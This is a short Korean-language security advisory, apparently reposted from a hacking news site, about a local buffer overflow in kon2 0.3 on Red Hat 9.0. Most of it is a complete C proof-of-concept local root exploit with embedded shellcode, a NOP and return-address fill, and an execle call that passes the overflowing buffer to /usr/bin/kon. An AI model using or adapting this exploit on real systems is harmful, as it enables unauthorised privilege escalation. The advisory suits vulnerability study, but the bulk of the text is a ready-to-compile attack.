레드햇 9.0 에서 kon2 버퍼오버플로우

발표날짜 : 2003.06.23

해당 시스템 : kon2 0.3

공격유형 : 로컬

위험도 : 상

문제점 :
kon2 소스와 -Console arg 에서 심각한 버그가 발견되었으며 다음의 코드를 이용하여 취약성 여부를 테스트해 보시기 바랍니다.

공격법 / 공격용 소스코드 :
/*
* Buffer overflow in /usr/bin/kon v0.3.9b for RedHat 9.0
*
* http://www.mail-archive.com/bugtraq@securityfocus.com/msg11681.html
*
* The original bug was found by wszx for RedHat 8.0 - Ported to C
*
* Compile: gcc -Wall kon2root kon2root.c
*
*/


#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define NOP 0x90
#define RET 0xbffffffa
#define VULN "/usr/bin/kon"
#define MAXBUF 800


static char w00tI4r3l33t[]="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
"\xff\xff/bin/id";


int main()
{
    int i, *egg;
    long retaddr;
    static char buff[MAXBUF];
    static char *sploit[0x02] = { w00tI4r3l33t, NULL };

    fprintf (stdout, "\n\n\n[ PoC code for local root exploit in %s ]\n", VULN);

    fprintf (stdout, "[ Coded by c0ntex - http://62.31.72.168 ]\n");

    fprintf (stdout, "[ For Linux RedHat v9 x86 - Ret_Addr 0xbffffffa ]\n\n\n\n");

    if((retaddr = 0xbffffffa - strlen(w00tI4r3l33t) - strlen(VULN)) != 0x00) {

    egg = (int *)(buff);
    }

    for(i = 0x00; i < MAXBUF; i += 0x04)
    *(egg)++ = retaddr; *(egg) = NOP;

    execle(VULN, VULN, "-Coding", buff, NULL, sploit);
    return(0x00);
}

출처: http://www.hackersnews.org